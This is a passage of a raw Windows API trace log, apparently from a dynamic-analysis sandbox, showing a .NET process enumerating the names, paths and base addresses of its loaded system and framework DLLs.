GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74ab0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="GDI32.dll") returned 0x9 [0145.835] CoTaskMemFree (pv=0x55b0d0) [0145.835] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.835] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74ab0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\GDI32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")) returned 0x1d [0145.836] CoTaskMemFree (pv=0x55b0d0) [0145.836] GetModuleInformation (in: hProcess=0x2a0, hModule=0x743d0000, lpmodinfo=0x246ed14, cb=0xc | out: lpmodinfo=0x246ed14*(lpBaseOfDll=0x743d0000, SizeOfImage=0x147000, EntryPoint=0x743e1cf0)) returned 1 [0145.836] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.836] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x743d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="USER32.dll") returned 0xa [0145.837] CoTaskMemFree (pv=0x55b0d0) [0145.837] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.837] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x743d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\USER32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")) returned 0x1e [0145.837] CoTaskMemFree (pv=0x55b0d0) [0145.837] GetModuleInformation (in: hProcess=0x2a0, hModule=0x741b0000, lpmodinfo=0x2470e20, cb=0xc | out: lpmodinfo=0x2470e20*(lpBaseOfDll=0x741b0000, SizeOfImage=0x2b000, EntryPoint=0x741b5680)) returned 1 [0145.849] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.849] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x741b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="IMM32.DLL") returned 0x9 [0145.849] CoTaskMemFree (pv=0x55b0d0) [0145.849] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.849] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x741b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\IMM32.DLL" (normalized: "c:\\windows\\syswow64\\imm32.dll")) returned 0x1d [0145.850] CoTaskMemFree (pv=0x55b0d0) [0145.850] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76d50000, lpmodinfo=0x2472f24, cb=0xc | out: lpmodinfo=0x2472f24*(lpBaseOfDll=0x76d50000, SizeOfImage=0xc000, EntryPoint=0x76d53930)) returned 1 [0145.850] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.850] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76d50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="kernel.appcore.dll") returned 0x12 [0145.851] CoTaskMemFree (pv=0x55b0d0) [0145.851] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.851] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76d50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")) returned 0x26 [0145.852] CoTaskMemFree (pv=0x55b0d0) [0145.852] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6f840000, lpmodinfo=0x2475050, cb=0xc | out: lpmodinfo=0x2475050*(lpBaseOfDll=0x6f840000, SizeOfImage=0x8000, EntryPoint=0x6f8417b0)) returned 1 [0145.852] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.852] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6f840000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="VERSION.dll") returned 0xb [0145.853] CoTaskMemFree (pv=0x55b0d0) [0145.853] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.853] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6f840000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\VERSION.dll" (normalized: "c:\\windows\\syswow64\\version.dll")) returned 0x1f [0145.853] CoTaskMemFree (pv=0x55b0d0) [0145.853] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69370000, lpmodinfo=0x247715c, cb=0xc | out: lpmodinfo=0x247715c*(lpBaseOfDll=0x69370000, SizeOfImage=0x6e1000, EntryPoint=0x6939cd70)) returned 1 [0145.854] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.854] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69370000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clr.dll") returned 0x7 [0145.854] CoTaskMemFree (pv=0x55b0d0) [0145.854] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.854] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69370000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clr.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clr.dll")) returned 0x35 [0145.855] CoTaskMemFree (pv=0x55b0d0) [0145.855] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6a880000, lpmodinfo=0x247928c, cb=0xc | out: lpmodinfo=0x247928c*(lpBaseOfDll=0x6a880000, SizeOfImage=0xf5000, EntryPoint=0x6a8d4160)) returned 1 [0145.855] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.855] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6a880000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="MSVCR120_CLR0400.dll") returned 0x14 [0145.856] CoTaskMemFree (pv=0x55b0d0) [0145.856] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.856] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6a880000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\MSVCR120_CLR0400.dll" (normalized: "c:\\windows\\syswow64\\msvcr120_clr0400.dll")) returned 0x28 [0145.857] CoTaskMemFree (pv=0x55b0d0) [0145.857] GetModuleInformation (in: hProcess=0x2a0, hModule=0x680b0000, lpmodinfo=0x247b3c0, cb=0xc | out: lpmodinfo=0x247b3c0*(lpBaseOfDll=0x680b0000, SizeOfImage=0x12b2000, EntryPoint=0x0)) returned 1 [0145.857] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.857] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x680b0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mscorlib.ni.dll") returned 0xf [0145.858] CoTaskMemFree (pv=0x55b0d0) [0145.858] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.858] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x680b0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\mscorlib\\7582400666d289c016013ad0f6e0e3e6\\mscorlib.ni.dll")) returned 0x68 [0145.859] CoTaskMemFree (pv=0x55b0d0) [0145.859] GetModuleInformation (in: hProcess=0x2a0, hModule=0x74dc0000, lpmodinfo=0x247d568, cb=0xc | out: lpmodinfo=0x247d568*(lpBaseOfDll=0x74dc0000, SizeOfImage=0xeb000, EntryPoint=0x74dfd650)) returned 1 [0145.859] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.859] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x74dc0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ole32.dll") returned 0x9 [0145.860] CoTaskMemFree (pv=0x55b0d0) [0145.860] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.860] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x74dc0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")) returned 0x1d [0145.861] CoTaskMemFree (pv=0x55b0d0) [0145.861] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73dd0000, lpmodinfo=0x247f66c, cb=0xc | out: lpmodinfo=0x247f66c*(lpBaseOfDll=0x73dd0000, SizeOfImage=0x75000, EntryPoint=0x73e09a60)) returned 1 [0145.861] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.861] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73dd0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="uxtheme.dll") returned 0xb [0145.862] CoTaskMemFree (pv=0x55b0d0) [0145.862] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.862] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73dd0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll")) returned 0x1f [0145.863] CoTaskMemFree (pv=0x55b0d0) [0145.863] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69e40000, lpmodinfo=0x2481778, cb=0xc | out: lpmodinfo=0x2481778*(lpBaseOfDll=0x69e40000, SizeOfImage=0x80000, EntryPoint=0x69e41180)) returned 1 [0145.863] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.863] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69e40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="clrjit.dll") returned 0xa [0145.864] CoTaskMemFree (pv=0x55b0d0) [0145.864] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.864] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69e40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\clrjit.dll" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\clrjit.dll")) returned 0x38 [0145.865] CoTaskMemFree (pv=0x55b0d0) [0145.865] GetModuleInformation (in: hProcess=0x2a0, hModule=0x76680000, lpmodinfo=0x24838b8, cb=0xc | out: lpmodinfo=0x24838b8*(lpBaseOfDll=0x76680000, SizeOfImage=0x92000, EntryPoint=0x766b8cf0)) returned 1 [0145.865] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.865] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x76680000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="OLEAUT32.dll") returned 0xc [0145.866] CoTaskMemFree (pv=0x55b0d0) [0145.866] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.866] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x76680000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\OLEAUT32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")) returned 0x20 [0145.867] CoTaskMemFree (pv=0x55b0d0) [0145.867] GetModuleInformation (in: hProcess=0x2a0, hModule=0x676e0000, lpmodinfo=0x24859cc, cb=0xc | out: lpmodinfo=0x24859cc*(lpBaseOfDll=0x676e0000, SizeOfImage=0x9cc000, EntryPoint=0x0)) returned 1 [0145.867] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.867] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x676e0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.ni.dll") returned 0xd [0145.868] CoTaskMemFree (pv=0x55b0d0) [0145.868] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.868] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x676e0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System\\1be7a15b1f33bf22e4f53aaf45518c77\\System.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system\\1be7a15b1f33bf22e4f53aaf45518c77\\system.ni.dll")) returned 0x64 [0145.869] CoTaskMemFree (pv=0x55b0d0) [0145.869] GetModuleInformation (in: hProcess=0x2a0, hModule=0x69c40000, lpmodinfo=0x2487b68, cb=0xc | out: lpmodinfo=0x2487b68*(lpBaseOfDll=0x69c40000, SizeOfImage=0x18f000, EntryPoint=0x0)) returned 1 [0145.870] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.870] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x69c40000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Drawing.ni.dll") returned 0x15 [0145.870] CoTaskMemFree (pv=0x55b0d0) [0145.870] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.871] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x69c40000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\System.Drawing.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.drawing\\1d52bd4ac5e0a6422058a5d62c9f6d9d\\system.drawing.ni.dll")) returned 0x74 [0145.871] CoTaskMemFree (pv=0x55b0d0) [0145.871] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66a70000, lpmodinfo=0x2489d34, cb=0xc | out: lpmodinfo=0x2489d34*(lpBaseOfDll=0x66a70000, SizeOfImage=0xc67000, EntryPoint=0x0)) returned 1 [0145.872] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.872] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66a70000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Windows.Forms.ni.dll") returned 0x1b [0145.873] CoTaskMemFree (pv=0x55b0d0) [0145.873] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.873] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66a70000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Windows.Forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\System.Windows.Forms.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.windows.forms\\fb06ad4bc55b9c3ca68a3f9259d826cd\\system.windows.forms.ni.dll")) returned 0x80 [0145.874] CoTaskMemFree (pv=0x55b0d0) [0145.874] GetModuleInformation (in: hProcess=0x2a0, hModule=0x6b4d0000, lpmodinfo=0x248bf24, cb=0xc | out: lpmodinfo=0x248bf24*(lpBaseOfDll=0x6b4d0000, SizeOfImage=0x92000, EntryPoint=0x6b4ddd60)) returned 1 [0145.875] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.875] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0145.876] CoTaskMemFree (pv=0x55b0d0) [0145.876] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.876] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x6b4d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll")) returned 0x78 [0145.877] CoTaskMemFree (pv=0x55b0d0) [0145.877] GetModuleInformation (in: hProcess=0x2a0, hModule=0x72d30000, lpmodinfo=0x248e0e8, cb=0xc | out: lpmodinfo=0x248e0e8*(lpBaseOfDll=0x72d30000, SizeOfImage=0x20f000, EntryPoint=0x72ddb0a0)) returned 1 [0145.877] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.877] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x72d30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="comctl32.dll") returned 0xc [0145.878] CoTaskMemFree (pv=0x55b0d0) [0145.878] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.878] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x72d30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_d3c2e4e965da4528\\comctl32.dll")) returned 0x77 [0145.879] CoTaskMemFree (pv=0x55b0d0) [0145.879] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73db0000, lpmodinfo=0x24903b4, cb=0xc | out: lpmodinfo=0x24903b4*(lpBaseOfDll=0x73db0000, SizeOfImage=0x1d000, EntryPoint=0x73db3b10)) returned 1 [0145.880] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.880] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73db0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="dwmapi.dll") returned 0xa [0145.881] CoTaskMemFree (pv=0x55b0d0) [0145.881] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.881] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73db0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll")) returned 0x1e [0145.882] CoTaskMemFree (pv=0x55b0d0) [0145.882] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66320000, lpmodinfo=0x24924c0, cb=0xc | out: lpmodinfo=0x24924c0*(lpBaseOfDll=0x66320000, SizeOfImage=0x721000, EntryPoint=0x0)) returned 1 [0145.883] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.883] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66320000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Core.ni.dll") returned 0x12 [0145.884] CoTaskMemFree (pv=0x55b0d0) [0145.884] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.884] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66320000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Core\\eb4cca4f06a15158c3f7e2c56516729b\\System.Core.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.core\\eb4cca4f06a15158c3f7e2c56516729b\\system.core.ni.dll")) returned 0x6e [0145.908] CoTaskMemFree (pv=0x55b0d0) [0145.908] GetModuleInformation (in: hProcess=0x2a0, hModule=0x66220000, lpmodinfo=0x249467c, cb=0xc | out: lpmodinfo=0x249467c*(lpBaseOfDll=0x66220000, SizeOfImage=0xf1000, EntryPoint=0x0)) returned 1 [0145.909] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.909] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x66220000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Configuration.ni.dll") returned 0x1b [0145.910] CoTaskMemFree (pv=0x55b0d0) [0145.910] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.910] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x66220000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Configuration\\fe4b221b4109f0c78f57a792500699b5\\System.Configuration.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.configuration\\fe4b221b4109f0c78f57a792500699b5\\system.configuration.ni.dll")) returned 0x80 [0145.911] CoTaskMemFree (pv=0x55b0d0) [0145.911] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65b00000, lpmodinfo=0x249686c, cb=0xc | out: lpmodinfo=0x249686c*(lpBaseOfDll=0x65b00000, SizeOfImage=0x71e000, EntryPoint=0x0)) returned 1 [0145.912] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.912] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65b00000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="System.Xml.ni.dll") returned 0x11 [0145.914] CoTaskMemFree (pv=0x55b0d0) [0145.914] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.914] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65b00000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\assembly\\NativeImages_v4.0.30319_32\\System.Xml\\4fbda26d781323081b45526da6e87b35\\System.Xml.ni.dll" (normalized: "c:\\windows\\assembly\\nativeimages_v4.0.30319_32\\system.xml\\4fbda26d781323081b45526da6e87b35\\system.xml.ni.dll")) returned 0x6c [0145.915] CoTaskMemFree (pv=0x55b0d0) [0145.915] GetModuleInformation (in: hProcess=0x2a0, hModule=0x764d0000, lpmodinfo=0x2498a20, cb=0xc | out: lpmodinfo=0x2498a20*(lpBaseOfDll=0x764d0000, SizeOfImage=0x6000, EntryPoint=0x764d1460)) returned 1 [0145.916] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.916] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x764d0000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="psapi.dll") returned 0x9 [0145.917] CoTaskMemFree (pv=0x55b0d0) [0145.917] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.917] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x764d0000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll")) returned 0x1d [0145.918] CoTaskMemFree (pv=0x55b0d0) [0145.918] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a50000, lpmodinfo=0x249ab24, cb=0xc | out: lpmodinfo=0x249ab24*(lpBaseOfDll=0x65a50000, SizeOfImage=0xa5000, EntryPoint=0x65a6ac50)) returned 1 [0145.919] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.919] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a50000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasapi32.dll") returned 0xc [0145.920] CoTaskMemFree (pv=0x55b0d0) [0145.920] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.920] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a50000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasapi32.dll" (normalized: "c:\\windows\\syswow64\\rasapi32.dll")) returned 0x20 [0145.921] CoTaskMemFree (pv=0x55b0d0) [0145.921] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a20000, lpmodinfo=0x249cc38, cb=0xc | out: lpmodinfo=0x249cc38*(lpBaseOfDll=0x65a20000, SizeOfImage=0x23000, EntryPoint=0x65a25570)) returned 1 [0145.922] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.922] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a20000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rasman.dll") returned 0xa [0145.923] CoTaskMemFree (pv=0x55b0d0) [0145.923] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.923] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a20000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rasman.dll" (normalized: "c:\\windows\\syswow64\\rasman.dll")) returned 0x1e [0145.924] CoTaskMemFree (pv=0x55b0d0) [0145.924] GetModuleInformation (in: hProcess=0x2a0, hModule=0x65a10000, lpmodinfo=0x249ed44, cb=0xc | out: lpmodinfo=0x249ed44*(lpBaseOfDll=0x65a10000, SizeOfImage=0x10000, EntryPoint=0x65a13820)) returned 1 [0145.925] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.926] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x65a10000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="rtutils.dll") returned 0xb [0145.927] CoTaskMemFree (pv=0x55b0d0) [0145.927] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.927] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x65a10000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\rtutils.dll" (normalized: "c:\\windows\\syswow64\\rtutils.dll")) returned 0x1f [0145.928] CoTaskMemFree (pv=0x55b0d0) [0145.928] GetModuleInformation (in: hProcess=0x2a0, hModule=0x73f30000, lpmodinfo=0x24a0e50, cb=0xc | out: lpmodinfo=0x24a0e50*(lpBaseOfDll=0x73f30000, SizeOfImage=0x5f000, EntryPoint=0x73f34af0)) returned 1 [0145.929] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.929] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x73f30000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ws2_32.dll") returned 0xa [0145.930] CoTaskMemFree (pv=0x55b0d0) [0145.930] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.930] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x73f30000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")) returned 0x1e [0145.931] CoTaskMemFree (pv=0x55b0d0) [0145.931] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71400000, lpmodinfo=0x24a2f5c, cb=0xc | out: lpmodinfo=0x24a2f5c*(lpBaseOfDll=0x71400000, SizeOfImage=0x4f000, EntryPoint=0x7140d850)) returned 1 [0145.933] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.933] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71400000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="mswsock.dll") returned 0xb [0145.934] CoTaskMemFree (pv=0x55b0d0) [0145.934] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.934] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71400000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\system32\\mswsock.dll" (normalized: "c:\\windows\\syswow64\\mswsock.dll")) returned 0x1f [0145.935] CoTaskMemFree (pv=0x55b0d0) [0145.935] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71450000, lpmodinfo=0x24a5068, cb=0xc | out: lpmodinfo=0x24a5068*(lpBaseOfDll=0x71450000, SizeOfImage=0x9b000, EntryPoint=0x7148f7e0)) returned 1 [0145.935] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.935] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71450000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="winhttp.dll") returned 0xb [0145.936] CoTaskMemFree (pv=0x55b0d0) [0145.936] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.936] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71450000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\winhttp.dll" (normalized: "c:\\windows\\syswow64\\winhttp.dll")) returned 0x1f [0145.937] CoTaskMemFree (pv=0x55b0d0) [0145.937] GetModuleInformation (in: hProcess=0x2a0, hModule=0x71520000, lpmodinfo=0x24a7174, cb=0xc | out: lpmodinfo=0x24a7174*(lpBaseOfDll=0x71520000, SizeOfImage=0x12000, EntryPoint=0x71524510)) returned 1 [0145.938] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.938] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x71520000, lpBaseName=0x55b0d0, nSize=0x800 | out: lpBaseName="ondemandconnroutehelper.dll") returned 0x1b [0145.939] CoTaskMemFree (pv=0x55b0d0) [0145.939] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.939] GetModuleFileNameExW (in: hProcess=0x2a0, hModule=0x71520000, lpFilename=0x55b0d0, nSize=0x800 | out: lpFilename="C:\\Windows\\SYSTEM32\\ondemandconnroutehelper.dll" (normalized: "c:\\windows\\syswow64\\ondemandconnroutehelper.dll")) returned 0x2f [0145.940] CoTaskMemFree (pv=0x55b0d0) [0145.940] GetModuleInformation (in: hProcess=0x2a0, hModule=0x714f0000, lpmodinfo=0x24a92c0, cb=0xc | out: lpmodinfo=0x24a92c0*(lpBaseOfDll=0x714f0000, SizeOfImage=0x2f000, EntryPoint=0x714fbb70)) returned 1 [0145.941] CoTaskMemAlloc (cb=0x804) returned 0x55b0d0 [0145.941] GetModuleBaseNameW (in: hProcess=0x2a0, hModule=0x714f0000, lpBaseName=0x55b0d0, nSize=0x800 | out: 